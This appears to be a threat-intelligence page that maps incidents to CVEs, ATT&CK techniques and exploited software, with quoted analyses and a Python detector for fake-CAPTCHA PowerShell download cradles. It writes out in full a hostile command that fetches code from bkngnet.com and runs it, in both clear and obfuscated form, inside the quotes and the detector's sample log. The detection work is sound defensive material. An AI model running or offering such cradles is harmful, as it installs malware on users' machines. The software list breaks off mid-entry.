SSH_Credential_Stuffing_and_Brute_Force; SSRF and Path Traversal; Stack-based Buffer Overflow Leading to Arbitrary Code Execution; Static Credential Exploitation; Static Credential Vulnerability Exploitation; Stockpiling Vulnerabilities by China; Stolen Credentials; Stolen Credentials Lacking Multi-Factor Authentication; Stolen Credit Card Data Leak; Stolen Credit Card Data Trafficking; Stolen Credit Card Trafficking; Stolen Identity Employment; Stolen Session Cookie Exploitation; Sub-threshold Cyberattacks; SuperBlack Ransomware Deployment via Fortinet vulnerabilities; Supply Chain Attack; Supply Chain Attack (European Medicines Agency); Supply Chain Attack (Phantom Circuit); Supply Chain Attack on Gluestack packages; Supply Chain Attack on Polyfill.io; Supply Chain Attack via Compromised NPM Package Token; Supply Chain Attack via Malicious NPM Packages; Supply Chain Attacks; Supply Chain Exposure;
Supply Chain Hardware Implant; Supply Chain Security Weakening; Suspicious Container Entrypoint with Base64 Encoded Command; Swatting; Swatting Threat; Symbolic Link trick bypasses FortiGate patches; Synthetic Identity Fraud using Generative AI; System Information Harvesting and Data Exfiltration via SMTP; System Misconfiguration; Targeted Exploitation of Qualcomm GPU Driver Vulnerabilities; Tax Preparation Firm Hacking; TBK DVR Command Injection via Malicious POST Request; TBK DVR Command Injection via Mirai; Tech Support Scam via Social Engineering and Technical Subterfuge; Technical Jargon Obfuscation; Telegram API Redirection via Malicious RubyGems; Telegram API Token Exfiltration via Malicious Ruby Gems; Telegram Exfiltration for MFA Bypass; TerraStealer v2; Third-Party Compromise Leading to Operational Disruption; Third-Party Vendor Data Breach; TikTok Internal API Exploitation; TOB-AXIOM-13: Under-constrained Scalar Multiplication Circuits; TOB-AXIOM-19: Broken assert_equal Function; TOB-AXIOM-3: Under-constrained idx_to_indicator Circuit; TOB-AXIOMv2-3: Misused debug_assert in range_check Method; Toll Fee Scams; TOUGHPROGRESS Malware Leveraging Google Calendar for C2; Triada Backdoor Preload; Triada Modular Backdoor; Trickbot Malware Infection; Trickbot Ransomware Deployment; Trimble Cityworks flaw exploited by Chinese threat actors; Trojan Horse Drone Smuggling; Trojanized software distribution; TunnelVision; Tupolev Data Breach; Typosquatting; udev persistence; Unauthenticated Camera Feed Access via HTTP/RTSP; Unauthenticated HMI Access; Unauthenticated Path Traversal in Deluge WebUI; Unauthorized Access to Personal Cell Phone; Unauthorized eSIM Profile Access; Unauthorized Network Access and Data Exfiltration; Unauthorized Resource Access and Sensitive Data Sharing; Unauthorized SaaS Collaboration; Unauthorized System and Data Access by AI Agents; Unauthorized Tracking via AirTags; Uncontrolled Search Path Element Local Privilege Escalation; Unencrypted HTTP Data Transmission; Unintended Lateral Movement;
Unpatched Internet-Facing Assets Exploit; Unprioritized Critical Vulnerability Exploitation; Unprioritized Vulnerability Overload; Unrotated Credentials; Unsecured Database; Unsecured systems/Forgotten Assets; Unspecified_Nation-State_Attack_on_ConnectWise; Untrusted Code Execution; Uploading arbitrary files via crafted HTTPS requests to gain root access; USB-based Malware Propagation; Use of AVCheck to Test Malware Detection; Use of Legitimate Software for Malicious Purposes; Use of Proxy IP Infrastructure for Concealing Origin; Use of Stolen Social Security Numbers for Identity Theft and Fraud; Use-After-Free (UAF) Exploit leading to Arbitrary Kernel Code Execution; Use-After-Free Memory Corruption via iMessage Nickname Updates; User Reporting Abuse for Surveillance; Vanta Customer Data Exposure; Various Email-Based Social Engineering Campaigns; VBA Macro Execution; VBS Script for Silent Installation of NetBird and OpenSSH; vBulletin Ad Template Injection; vBulletin API and Template Abuse; Vendor Email Compromise (VEC); Vibe Coding; ViewState Code Injection; ViewState Code Injection with Godzilla Framework; ViewState Code Injection with Publicly Available Machine Keys; Vishing and Social Engineering with AI-generated Voice; Vishing attack on Salesforce Data Loader; Vishing Attack on Salesforce Users; Vishing Campaign Targeting Salesforce Data with Fake Data Loader App; Vishing Campaign to Deploy Malicious Data Loader; Vishing for MFA Reset and Account Takeover; Voice Phishing (Vishing); Volt Typhoon Exploitation of US Critical Infrastructure; Volt Typhoon Network Squatting; Volt Typhoon targeting US water facilities; VPN_Circumvention_of_Age_Verification; Weak Passwords; Weakened Cryptography; Weaponized Hardware Implant via Manipulated Keyboard; Weaponized Pirated Software (Sandworm); Weaponizing Dependabot for Confused Deputy Attacks; Web Browser Exploitation; Web Crawler Exploitation using Spider Honeypots; Web Injection via Malicious Browser Extension; Web Shell Deployment via Internet-Facing Web Server Flaw;
Web Shell Upload and Execution; Web Shell Upload/Execution; Web Skimming; Webcam EDR Bypass; Whisper Backdoor using compromised Exchange webmail; Whitespace Obfuscation; Whitespace Trick in Python Backdoors; Windows Defender exclusion via PowerShell; Wiper Malware via Malicious NPM Packages; WooCommerce Site Hijacking via Fake Security Patches; XSS in Webmail Servers; XZ Utils Backdoor; YouTube Channel Email Address Exposure via API Chaining; YouTube Partner Program Email Address Disclosure via Access Control Issue; Zanubis; Zergeca Botnet; Zero-day Exploit of ScreenConnect; Zero-day Exploits Used by Cellebrite; Zero-day in MagicLine4NX supply chain attack; Zero-Day Vulnerability Exploitation in Spyware Campaigns; ZeroCrumb; Zerolot
Vulnerabilities: CVE-2014-2120 CVE-2017-0199 CVE-2017-11882 CVE-2017-7178 CVE-2017-9805 CVE-2018-0802 CVE-2018-13379 CVE-2019-13272 CVE-2020-12812 CVE-2020-14144 CVE-2020-28895 CVE-2020-3259 CVE-2020-35198 CVE-2021-22205 CVE-2021-3156 CVE-2021-32030 CVE-2022-0847 CVE-2022-1040 CVE-2022-3699 CVE-2022-38028 CVE-2022-41040 CVE-2022-41082 CVE-2023-1389 CVE-2023-20109 CVE-2023-20198 CVE-2023-22515 CVE-2023-26083 CVE-2023-27855 CVE-2023-27856 CVE-2023-2917 CVE-2023-34039 CVE-2023-34048 CVE-2023-35082 CVE-2023-38035 CVE-2023-38831 CVE-2023-39780 CVE-2023-40044 CVE-2023-4041 CVE-2023-4058 CVE-2023-46604 CVE-2023-46747 CVE-2023-46748 CVE-2023-48409 CVE-2023-49103 CVE-2023-49606 CVE-2023-4966 CVE-2023-50164 CVE-2023-51467 CVE-2023-6241 CVE-2024-13915 CVE-2024-13916 CVE-2024-13917 CVE-2024-1708 CVE-2024-1709 CVE-2024-21410 CVE-2024-21762 CVE-2024-21894 CVE-2024-23222 CVE-2024-23897 CVE-2024-24691 CVE-2024-27198 CVE-2024-27199 CVE-2024-28991 CVE-2024-28995 CVE-2024-30850 CVE-2024-31839 CVE-2024-35250 CVE-2024-36401 CVE-2024-37085 CVE-2024-3721 CVE-2024-37383 CVE-2024-38475 CVE-2024-38476 CVE-2024-38812 CVE-2024-38814 CVE-2024-40711 CVE-2024-40766 CVE-2024-42009 CVE-2024-43093 CVE-2024-43461 CVE-2024-44243 CVE-2024-45519 CVE-2024-4577 CVE-2024-51378 CVE-2024-51567 CVE-2024-53298 CVE-2024-55591 CVE-2024-56145 CVE-2024-57726 CVE-2024-57727 CVE-2024-57728 CVE-2024-8190 CVE-2024-8963 CVE-2024-9047 CVE-2025-0072 CVE-2025-0285 CVE-2025-0286 CVE-2025-0287 CVE-2025-0288 CVE-2025-0289 CVE-2025-12654 CVE-2025-2011 CVE-2025-20129 CVE-2025-20130 CVE-2025-20163 CVE-2025-20188 CVE-2025-20261 CVE-2025-20286 CVE-2025-21204 CVE-2025-21333 CVE-2025-21479 CVE-2025-21480 CVE-2025-22230 CVE-2025-23006 CVE-2025-23120 CVE-2025-24016 CVE-2025-24071 CVE-2025-2502 CVE-2025-26396 CVE-2025-26443 CVE-2025-26468 CVE-2025-27038 CVE-2025-27363 CVE-2025-2783 CVE-2025-2857 CVE-2025-30183 CVE-2025-30184 CVE-2025-30406 CVE-2025-30507 CVE-2025-30515 CVE-2025-31022 CVE-2025-31324 CVE-2025-31651 CVE-2025-32433 
CVE-2025-32756 CVE-2025-37089 CVE-2025-37090 CVE-2025-37091 CVE-2025-37092 CVE-2025-37093 CVE-2025-37094 CVE-2025-37095 CVE-2025-37096 CVE-2025-37099 CVE-2025-3755 CVE-2025-3916 CVE-2025-3935 CVE-2025-41438 CVE-2025-4427 CVE-2025-4428 CVE-2025-4598 CVE-2025-46352 CVE-2025-4664 CVE-2025-48745 CVE-2025-48757 CVE-2025-48827 CVE-2025-48828 CVE-2025-49113 CVE-2025-5036 CVE-2025-5054 CVE-2025-5068 CVE-2025-5419 CVE-2025-5473 CVE-2025-5474 CVE-2025-5480 CVE-2025-5481 CVE-2025-5747 CVE-2025-5748 CVE-2025-5749 CVE-2025-5750 CVE-2025-5751
MITRE ATT&CK TTP: Application Layer Protocol: T1071; Application Layer Protocol: DNS: T1071.004; Brute Force: T1110; Brute Force: Credential Stuffing: T1110.004; Command and Scripting Interpreter: T1059; Command and Scripting Interpreter: PowerShell: T1059.001; Command and Scripting Interpreter: Windows Command Shell: T1059.003; Content Injection: T1659; Credentials from Password Stores: T1555; Data Encrypted for Impact: T1486; Deobfuscate/Decode Files or Information: T1140; Drive-by Compromise: T1189; Email Collection: Email Forwarding Rule: T1114.003; Exfiltration Over C2 Channel: T1041; Exploit Public-Facing Application: T1190; Exploitation for Client Execution: T1203; Exploitation for Privilege Escalation: T1068; Exploitation of Remote Services: T1210; External Remote Services: T1133; File and Directory Discovery: T1083; Impair Defenses: T1562; Indicator Removal: T1070; Ingress Tool Transfer: T1105; Inhibit System Recovery: T1490; Input Capture: T1056; Lateral Tool Transfer: T1570; Modify Registry: T1112; Native API: T1106; Non-Application Layer Protocol: T1095; Obfuscated Files or Information: T1027; OS Credential Dumping: T1003; Phishing: T1566; Spearphishing Attachment: T1193 (legacy ID, now T1566.001); Spearphishing Link: T1192 (legacy ID, now T1566.002); Process Injection: T1055; Proxy: T1090; Remote Services: T1021; Replication Through Removable Media: T1091; Scheduled Task/Job: T1053; Service Stop: T1489; Supply Chain Compromise: T1195; System Information Discovery: T1082; Trusted Relationship: T1199; Unsecured Credentials: T1552; User Execution: T1204; Valid Accounts: T1078; Valid Accounts: Cloud Accounts: T1078.004.
Labels on the page that are not ATT&CK technique names: Access to Data; Add subtle data exfiltration routines; Authentication Bypass; Back door merge via branch manipulation; Botnet; Code Injection; Continuous integration or continuous deployment (CI/CD) configuration tampering; Credential compromise of automation tokens; Credential theft from maintainers or reviewers; Data Exfiltration; Data Leakage; Exploitation for Impact; Heap Metadata; Insider threat from a compromised or malicious contributor; Lateral Movement; Modify update mechanisms to include malicious payloads; Pull request poisoning through reviewer fatigue; Remote Access Trojan; Repository or organization takeover; Social engineering of contributor trust; Stack-based Buffer Overflow; Supply chain infiltration via compromised dependencies; Under-constrained; Weak review policies or bypassed reviews.
Quoted article analysis attached to these mappings (fake Booking.com campaign): "Cybercriminals have started a campaign of redirecting links placed on gaming sites and social media—and as sponsored ads—that lead to fake websites posing as Booking.com"; "fake CAPTCHA websites hijack your clipboard"; "The malicious Captcha form tells the user to copy the content of the clipboard into the Windows Run dialog box and execute the instructions from the above command."; "The PowerShell script uses Invoke-RestMethod to retrieve data from 'bkngnet.com'"; the command "downloads and executes ckjg.exe which in turn would download and execute a file called Stub.exe". The mixed casing, quote interruption and variable-name manipulation in the second form below are noted on the page as common obfuscation techniques.
Quoted command (clear form): powershell -NoProfile -WindowStyle Hidden -Command "$banp = 'bkngnet.com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv"
Quoted command (obfuscated form): pOwERsheLl –N"O"p"rO" /w h -C"Om"ManD "$b"a"np = 'b"kn"g"n"et.com';$r"k"v = I"n"v"o"k"e-"R"e"stMethod -Uri $ba"n"p;I"nv"oke"-"E"xp"r"es"sion $r"k"v"
Quoted article analysis (SentinelOne PurpleHaze): "attackers targeted a third-party organization responsible for managing hardware logistics for SentinelOne employees at the time"; "threat actors targeted SentinelOne servers that could be reached via the Internet to conduct 'extensive remote reconnaissance'"; "the threat actor exploited two now-known Ivanti cloud vulnerabilities—CVE-2024-8963 and CVE-2024-8190—as an attack chain a few days before they were publicly discovered" against a "'leading' European media organization"; "A thorough investigation into SentinelOne's infrastructure, software and hardware assets found no evidence of compromise"; "SentinelOne remains unclear about whether the perpetrators' focus was solely on the targeted IT logistics organization or if they intended to establish a foothold to extend their reach to downstream organizations as well".
Quoted article analysis (Google Chrome CVE-2025-5419): "Google has released an update for the Chrome browser to patch an actively exploited flaw."; "Prior to Google Chrome version 137.0.7151.68, this vulnerability allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page."
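The fake-CAPTCHA chain described above (clipboard hijack, paste into the Run dialog, PowerShell fetches a second stage from bkngnet.com and hands it to Invoke-Expression) is what an endpoint detection keys on, and the obfuscated variant shows why matching the raw command line is not enough. The following is an added example, not code from the page's source site or from any vendor: it normalises a process-creation command line (case-folds, drops the quote characters that quote interruption inserts, maps dash look-alikes to "-", collapses whitespace), then alerts only on a fetch-then-evaluate cradle, raising severity when the window is hidden or the parent is explorer.exe, which is what a Run-dialog launch looks like. The tab-separated log format, the benign sample lines and the alert structure are constructed for this example; the only real artefacts are the two commands quoted on the page.

```python
"""Detect ClickFix-style PowerShell download cradles in process-creation logs.

Added example (not the page's or any vendor's code). Log format assumed here:
one line per process start, tab-separated: timestamp, parent image, command.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample log: the two commands quoted on the page launched from the
# Run dialog (parent explorer.exe), plus two benign PowerShell runs.
SAMPLE_LOG = (
    "2025-06-04T10:12:03Z\texplorer.exe\t"
    "powershell -NoProfile -WindowStyle Hidden -Command "
    "\"$banp = 'bkngnet.com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv\"\n"
    "2025-06-04T10:13:41Z\texplorer.exe\t"
    "pOwERsheLl \u2013N\"O\"p\"rO\" /w h -C\"Om\"ManD \"$b\"a\"np = 'b\"kn\"g\"n\"et.com';"
    "$r\"k\"v = I\"n\"v\"o\"k\"e-\"R\"e\"stMethod -Uri $ba\"n\"p;I\"nv\"oke\"-\"E\"xp\"r\"es\"sion $r\"k\"v\"\n"
    "2025-06-04T10:15:00Z\tcmd.exe\t"
    "powershell.exe -NoProfile -Command \"Get-Service | Where-Object Status -eq 'Running'\"\n"
    "2025-06-04T10:16:22Z\tcmd.exe\t"
    "powershell -Command \"Invoke-WebRequest -Uri https://example.com/tool.zip -OutFile C:\\tools\\tool.zip\"\n"
)

# Dash look-alikes (en dash, em dash, horizontal bar) that PowerShell's parser
# accepts as a parameter prefix; the obfuscated sample uses the en dash.
_DASHES = str.maketrans({"\u2013": "-", "\u2014": "-", "\u2015": "-"})


def normalize(cmdline: str) -> str:
    """Undo the cheap obfuscations quoted on the page so fixed indicators match."""
    text = cmdline.translate(_DASHES)
    text = text.replace('"', "")               # I"n"v"oke -> Invoke (quote interruption)
    text = re.sub(r"\s+", " ", text).strip()   # collapse odd whitespace
    return text.lower()                        # pOwERsheLl -> powershell


# Indicators evaluated on the normalised command line (single spaces, lower case).
INDICATORS = {
    "remote_fetch": re.compile(r"\b(?:invoke-restmethod|irm|invoke-webrequest|iwr|downloadstring)\b"),
    "eval": re.compile(r"\b(?:invoke-expression|iex)\b"),
    "hidden_window": re.compile(r"(?:-w(?:in(?:dowstyle)?)? h(?:idden)?\b|/w h\b)"),
    "no_profile": re.compile(r"-nop\w*\b"),    # -nop, -nopro, -noprofile (prefix forms)
}
QUOTE_INTERRUPTION = re.compile(r'[A-Za-z]"[A-Za-z]')      # a quote splitting a token
HOST_IN_STRING = re.compile(r"'([a-z0-9-]+(?:\.[a-z0-9-]+)+)'")  # 'bkngnet.com'
RUN_DIALOG_PARENTS = {"explorer.exe"}                        # Win+R launches under Explorer


@dataclass
class Alert:
    timestamp: str
    parent: str
    host: Optional[str]
    indicators: List[str] = field(default_factory=list)
    severity: str = "medium"


def analyse(line: str) -> Optional[Alert]:
    """Return an Alert when a PowerShell command fetches remote content and evaluates it."""
    parts = line.rstrip("\n").split("\t", 2)
    if len(parts) != 3:
        return None
    ts, parent, cmd = parts
    norm = normalize(cmd)
    if not norm.startswith(("powershell", "pwsh")):
        return None
    hits = [name for name, rx in INDICATORS.items() if rx.search(norm)]
    if QUOTE_INTERRUPTION.search(cmd):               # measured on the raw line
        hits.append("quote_interruption")
    if any(ch in cmd for ch in "\u2013\u2014\u2015"):
        hits.append("dash_substitution")
    # The cradle itself (fetch + eval) is the alert condition; the rest adjusts severity.
    if not {"remote_fetch", "eval"} <= set(hits):
        return None
    match = HOST_IN_STRING.search(norm)
    loud = "hidden_window" in hits or parent.lower() in RUN_DIALOG_PARENTS
    return Alert(ts, parent, match.group(1) if match else None, hits, "high" if loud else "medium")


def scan(log_text: str) -> List[Alert]:
    """Run analyse() over every non-empty line of a log."""
    return [a for a in (analyse(l) for l in log_text.splitlines() if l.strip()) if a]


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

Running the block prints two alerts, both with host bkngnet.com and severity high; the obfuscated line additionally carries the quote_interruption and dash_substitution indicators, while the two benign lines (a service query, and a download that writes to disk without evaluating anything) produce nothing. Normalising before matching is the point: a rule written against "Invoke-RestMethod" alone never sees it in the second sample.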
Exploited Software: @crypto-exploit (npm); @gluestack-ui/utils; @react-native-aria/button; @react-native-aria/checkbox; @react-native-aria/combobox; @react-native-aria/disclosure; @react-native-aria/focus; @react-native-aria/interactions; @react-native-aria/listbox; @react-native-aria/menu; @react-native-aria/overlay; @react-native-aria/overlays; @react-native-aria/radio; @react-native-aria/separator; @react-native-aria/slider; @react-native-aria/switch; @react-native-aria/tabs; @react-native-aria/toggle; @react-native-aria/utils; /get_creator_channels endpoint; 011209 Intercom; 23andMe; 4t Tray Minimizer; a-b27; ABAP; accounts.google[.]com/signin/usernamerecovery; AcidPour; AcidRain; Acreed; Action1; Active Directory; Active! Mail; Adodb.Stream; Adreno Graphics Processing Unit (GPU) driver; Ahold Delhaize USA's grocery stores; AI Models trained on leaked passwords; AI/LLM coding assistants; aliyun-ai-labs-snippets-sdk, ai-labs-snippets-sdk, and aliyun-ai-labs-sdk (PyPI); Amazon and Microsoft cloud services; Amazon Prime Video; Amazon Web Services (AWS); Android; Android 13; Android Applications; Android Open Source Project (AOSP); Android Open Source Project (AOSP) devices; Android operating system; Android OS; Android phones; Android-based products; Android-based streaming devices (Badbox 2.0); Anel Backdoor; Antidote Connector; AnyDesk; Apache ActiveMQ; Apache HTTP Server; Apache OfBiz; Apache OFBiz; Apache Struts; Apache Struts 2; Apache Struts2; Apache Tomcat; APIs; Apple iMessage; Apple iOS; Apple Mail; Apple products; Apple Safari; Apple Safari (version unspecified); Apple TV+; APT41's TOUGHPROGRESS malware; Arm Mali GPU; ASP.NET; ASP.NET (with ViewState enabled); Asus Routers; ASUS routers; ASUS Routers; ASUS routers with AiCloud; ASUS RT-AX55; ASUS RT-AX55 devices; AsyncRAT; Atlassian Confluence; Atomic macOS Stealer (AMOS); Autodesk Revit; Automated systems used in drug development, diagnostics, and lab operations; AVCheck; AVG Online Security; Awesome Screen Recorder & Screenshot; AWS; AWS S3; Azure OpenAI; Backdoor.AndroidOS.Triada.z;
BadBox 2 botnet; BADBOX 2.0; Banks and Crypto Exchanges; Barracuda ESG; Bazarloader; BazarLoader; Beavertail; BeyondTrust; biatec-avm-gas-station; BlackLock Data Leak Site; BPFDoor; Brave Browser; Brawl Stars; Broadcom Brocade Fabric OS; Browsec VPN; Browsec VPN (ID: omghfjlpggmjjaagoclmmobgdodcjboh); Browser; Browser extensions; Browser Extensions; Canonical apport (up to 2.32.0); Cargo; Cellebrite's mobile forensic tools; Cellebrite's Universal Forensic Extraction Device (UFED); Chaos ransomware; Chaos RAT; ChatGPT; Check Point gateway devices; Check Point gateways; Chinese-made cameras; Chrome; Chrome Loader; Chrome V8 JavaScript engine; Chromium-based browsers (e.g., Chrome); Chromium-based browsers (Microsoft Edge, Brave, Opera, and Vivaldi); Chromium-based browsers (versions unspecified); Cisco Identity Services Engine (ISE); Cisco Integrated Management Controller (IMC); Cisco IOS XE; Cisco IOS XE Wireless LAN Controllers (WLCs); Cisco IOS XE WLC; Cisco ISE; Cisco Nexus Dashboard Fabric Controller (NDFC); Cisco Smart Licensing Utility; Citrix; Citrix NetScaler; Citrix NetScaler ADC/Gateway; Claude; Cloudflare Turnstile (Impersonated); Coinbase; Colorama and Colorizr (PyPI packages); com.pri.applock; com.pri.factorytest; Compromised Login Credentials (SSH); computer networks management tool; ConnectWise ScreenConnect; Consilium Safety CS5000 Fire Panel; Contec CMS8000 patient monitor; Contec's SolarView Compact; Conti; CoreFoundation (versions prior to iOS 17.0 beta 5); cputil-node; Craft CMS; Critical Applications; Critical Infrastructure Systems; Crocodilus Android Banking Trojan; Crosshair X; CrowdStrike; CrushFTP; Crypt.guru; Cryptor.biz; Custom Client-Side Extension DLLs; CVE-2023-26083; CVE-2023-39780; CVE-2023-48409; CVE-2024-8963 and CVE-2024-8190; CyberLock; CyberLock Ransomware; CyberPanel; D-Link; D-Link devices; Danabot; DanaBot; DEA online portal; DeepSeek; Defender Control; Deluge BitTorrent client; Dependabot; Development applications (unspecified); DeviceMetadataWizard.exe; DIA internal computerized tracking systems; Diavol; Digital Certificates from Chunghwa Telecom and Netlock;
Discord; Disney+; DNS (Domain Name System); Docker; Docker API; Docker CLI; Docker Engine API; DrayTek routers; DrayTek Routers; Drones; DualSafe Password Manager & Digital Vault; DualSafe Password Manager & Digital Vault (ID: lgbjhdkjmpgjgcbcdlhkokkckpjmedgc); easyjson; Edge Devices; Edimax IP cameras; Email Client Software (Unspecified); Endpoint administration framework; Endpoint Administration Framework; Entities exploited by Playcrypt ransomware; Entra; Entra ID; Epsimed MN-120; Equatio – Math Made Digital; Erlang/Open Telecom Platform (OTP) SSH; ERMAC; ESXi; ESXi Server; European Medicines Agency (Files related to Pfizer and BioNTech’s COVID-19 vaccine); Evilginx; Exchange Server 2016; Exchange Server 2019; express-api-sync; Facebook; Facebook Android App; Fastlane plugin (RubyGems); fastlane-plugin-proxy_teleram; fastlane-plugin-telegram; fastlane-plugin-telegram-proxy; FinalDraft; Firebase; Firefox; Firewalls; FormBook; FortiGate; Fortinet; Fortinet firewalls; Fortinet Fortigate; Fortinet FortiOS; Fortinet FortiOS and FortiProxy; Fortinet FortiOS/FortiProxy; Fortinet FortiVoice; FortiOS; FortiProxy; FortiVoice; Fortnite; Fortra GoAnywhere MFT; FreeType; Fronius inverters; FTP Servers; FunkLocker; Gemini; Generators; GhostLocker; GhostLocker 2.0; GhostStealer; GIMP; Gitea; GitHub; GitHub Gist; GitHub repositories; GitLab; Gladinet CentreStack; Gladinet CentreStack/Triofox; Glitch; Global Positioning System (GPS) signals; gluestack-ui/utils; Gmail; GMP's CCTV System; GoFing; Google; Google Account; Google Account Recovery Process; Google Android; Google Apps Script; Google Calendar; Google Chrome; Google Chromium V8; Google Drive; Google username recovery form (deprecated, no-JavaScript version); Google's Looker Studio; GOREVERSE family of backdoors; GoVision device; Halo2 (Axiom's modified version and PSE's Halo2 fork); HashiCorp Consul; HashiCorp Nomad; HBO Max; Hedera Hashgraph network users non-custodial wallets; Hedera Hashgraph wallets; HermeticWiper; Hewlett Packard Enterprise Insight Remote Support;
Hewlett Packard Enterprise StoreOnce VSA; Hitachi Energy Relion 670, 650 series and SAM600-IO Product; HMI (Human-Machine Interfaces) in Water and Wastewater Systems; HMRC online tax record accounts; Home Depot shopping cart; Hook Android banking trojan; Hosting company customer accounts; Hotel Booking Systems; HPE StoreOnce; HTTP-based cameras; Huawei HG532 router; IBM Cloud Pak for Security; IBM QRadar; IcedID; IIS; imad213; iMessage; iMessage (imagent); Impacket; Industrial Control System (ICS) protocols (e.g., Modbus); Instagram; Instagram Android App; Integrated Dell Remote Access Controller (iDRAC); Interlock ransomware; Interlock Ransomware; Internet Archive; Internet Explorer; Internet Information Services (IIS); InvisibleFerret; iOS; iOS 18.5; iOS imagent process; iOS Kernel (versions 14 & 15); iOS versions up to 18.1.1; IP cameras and DVRs; iPhone; IPRoyal; Ivanti; Ivanti bugs CVE-2024-8963 and CVE-2024-8190; Ivanti Cloud Service Appliances; Ivanti Connect Secure; Ivanti Connect Secure, Policy Secure and ZTA Gateways; Ivanti EPMM; Ivanti EPMM (MobileIron Core); JetBrains; JetBrains TeamCity; Jira; Juniper Routers; KillSecurity 2.0; KillSecurity 3.0; ks.sys driver; Kubernetes; Kyivstar; Langflow; Large Language Models (LLMs); Large Language Models (LLMs) and AI Integrations; Law Enforcement Database (US Drug Enforcement Agency (DEA)); Lee Enterprises Network; Legacy Billing Service; Legacy Detection Systems; Legacy Driver (Vulnerable); Lenovo Diagnostics Driver; lfwfinance/sdk; lfwfinance/sdk-dev; libmalloc (versions prior to iOS 17); LinkedIn; Linux; Linux Kernel; Linux Kernel (Dirty Pipe); Linux Kernel (Unspecified Version); LiteSpeed Cache; LiteSpeed Cache WordPress plugin; LLM-generated code; Lobshot; LockBit 3.0; Looker Studio; Lovable Apps; Low-end laptops; Lucky_Gh0$t; Lucky_Gh0$t (Yashma ransomware variant); Lumma; Lumma infostealer; Lumma Infostealer; Lumma Stealer; Lumma Stealer (LummaC2); LummaC2; macOS; Mali Driver (Kernel Component); Mali GPU Driver; Marks & Spencer Online Ordering System; MDaemon Email Server; MeinVodafone; Merck (NotPetya malware);
MeshCentral Agent; Meshtastic Network; Meta infostealer; Metasploit; Meteobridge (version 6.2); Microsoft; Microsoft 365; Microsoft Active Directory; Microsoft Azure; Microsoft Cloud Services; Microsoft Edge; Microsoft Editor – Spelling & Grammar Checker; Microsoft Entra ID; Microsoft Equation Editor; Microsoft Exchange; Microsoft Exchange Server; Microsoft IIS; Microsoft KMS activators; Microsoft Office; Microsoft Office (CVE-2017-11882); Microsoft Office 365; Microsoft Power Pages; Microsoft Software; Microsoft SQL Server; Microsoft Teams; Microsoft Windows; Microsoft.XMLHTTP; Minecraft; Mitsubishi Electric MELSEC iQ-F Series; Mobile Applications (Wealth Management); Mobile Apps (Government-Developed and Third-Party); Mobile Devices; Moneybox Bespoke Investment Platform (Sycamore); Mozilla Firefox; MSN Homepage, Bing Search & News; MSN New Tab; MSN New Tab (ID: lklfbkdigihjaaeamncibechhgalldgl); Multiple Cisco Small Business RV Series Routers; MyGov.be; NASA's open source software; NetBird; Netflix; NetSupport Manager; NetSupport RAT; Network Gear; NGate; Node.js; NodeSnake; NodeSnake RAT; NoodleRAT; NotPetya; NPM packages; NPM Packages Disguised as Express Utilities; NTFS Filesystem; Numero; Numero Malware; Nvidia CUDA Toolkit; OAuth Apps; Okta; Old plugins, CMS versions or themes; Online Security & Privacy extension; Open Source Projects on Github; Open WebUI; OpenSSH; OpenSSL; Operating System; OT systems; OtterCookie; OttoKit WordPress plugin; Outdated software in Biotech; Outlook; Outlook 2016; Output Messenger; Packit Stealer; Palo Alto Networks Expedition; Palo Alto Networks PAN-OS; Palo Alto PAN-OS; pancake_uniswap_validators_utils_snipe, pancakeswap-oracle-prediction, ethereum-smart-contract, env-process (npm); Paragon Partition Manager; passwd; PathWiper; PayDay Loader; PayU CommercePro plugin for WordPress; PCs; PDQ Connect Agent; Peet's Coffee app; Phishing Emails; phones used by national security officials; PHP; PI Rank; PI Rank (ID: ccgdboldgdlngcgfdolahmiilojmfndl); PlayStation; PlayStation Network; Podman; Polyfill;
Polyfill.io; poppo213; Power Pages; PowerSchool; Powershell; PowerShell; Premium WordPress 'Motors' theme; PrimeCache (IIS Module); Progress Telerik Report Server; PureCrypter; PureLogs Stealer; Putty; Pygmy Goat; PyPI packages (Python script stealer); PyPI packages (Solana key stealer); PyPI packages typosquatting colorama and colorizr; PyTorch models (PyPI); Qakbot; Qualcomm; Qualcomm Adreno GPU driver; Qualcomm Adreno GPU drivers; Qualcomm chipsets; Qualcomm components; Qualcomm products; Raccoon; Ralord Ransomware; rand-user-agent; Ransomware; Rapid SCADA; Raspberry Pi Zero W; Raw PC Darts; RawGAT-ST; RawNet2; RDP; RDP (Windows); React Native Aria Packages; react-native-aria packages; Realtek SDK; Redline; RedLine; RedLine infostealer; RedLine Malware; regsvr32.exe; Remcos; Ring app; RoamingMOUSE; Robbinhood ransomware; Roblox; Roundcube; Roundcube webmail; Roundcube Webmail; RoundCube Webmail; RTSP cameras; RuntimeBroker.exe; Ryuk; SaaS Accounts; Sakura RAT; Salesforce; Salesforce Data Loader; Salesforce Platform; Samsung MagicINFO 9 Server; Sante DICOM Viewer Pro; SAP ERP; SAP NetWeaver; SAP NetWeaver Visual Composer; SAP SuccessFactors; Satellites in Low Earth Orbit; Schneider Electric Product; ScopeCreep; ScreenConnect; ScreenConnect (versions 25.2.3 and earlier); Scrolling Screenshot Tool & Screen Capture; SearchFilter.exe; SellerSprite - Amazon Research Tool; semantic-types (PyPI); SEMRush Rank; SEMRush Rank (ID: idbhoeaiokcojcgappfigpifhpkjgmab); SentinelOne Singularity Endpoint protection service; ShadowPad; Silicon Labs Gecko Bootloader on ARM (Firmware Update File Parser modules); SimpleHelp; SimpleHelp RMM platform; SimpleHelp RMM Software; SMA Sunny Webbox; Small Business Administration’s Economic Injury Disaster Loan program; Smokeloader; SMS; SMS-based two-factor authentication (2FA); Snapchat; Snowflake; Snowflake cloud platform; solana-live (PyPI); Solana-themed packages (PyPI); Solare Datensysteme SolarLogs; SolarWinds; SolarWinds DameWare Mini Remote Control Service; SolarWinds Serv-U; SolarWinds Web Help Desk; SonicWall; SonicWall SMA 
